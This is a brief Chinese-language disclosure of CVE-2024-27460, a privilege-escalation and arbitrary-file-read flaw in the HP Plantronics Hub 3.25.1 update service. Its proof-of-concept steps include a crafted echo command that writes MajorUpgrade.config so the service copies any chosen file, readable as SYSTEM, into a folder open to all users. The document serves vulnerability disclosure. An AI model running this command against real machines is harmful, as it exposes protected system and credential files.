CVE-2024-27460
HP Plantronics Hub 3.25.1 更新程序权限提升/任意文件读取
描述:
HP Plantronics Hub 3.25.1 存在一个漏洞,允许低权限用户在安装了该应用程序的机器上以 SYSTEM 身份执行任意文件读取。此外,还可以利用此漏洞将权限提升至 SYSTEM 用户。
受影响版本
HP Plantronics Hub 3.25.1
受影响的服务
不安全路径:
"C:\ProgramData\Plantronics\Spokes3G"
服务:
PlantronicsUpdateService
复现步骤(POC):
- 打开 cmd.exe
- 使用 cd C:\ProgramData\Plantronics\Spokes3G 导航
- 执行 echo ^|^|<你想要的文件完整路径>^|> MajorUpgrade.config
- 所需文件将被复制到 "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp",任何经过身份验证的用户均可访问。
发现者:
- Farid Zerrouk(比利时德勤)
- Alaa Kachouh(万事达卡欧洲)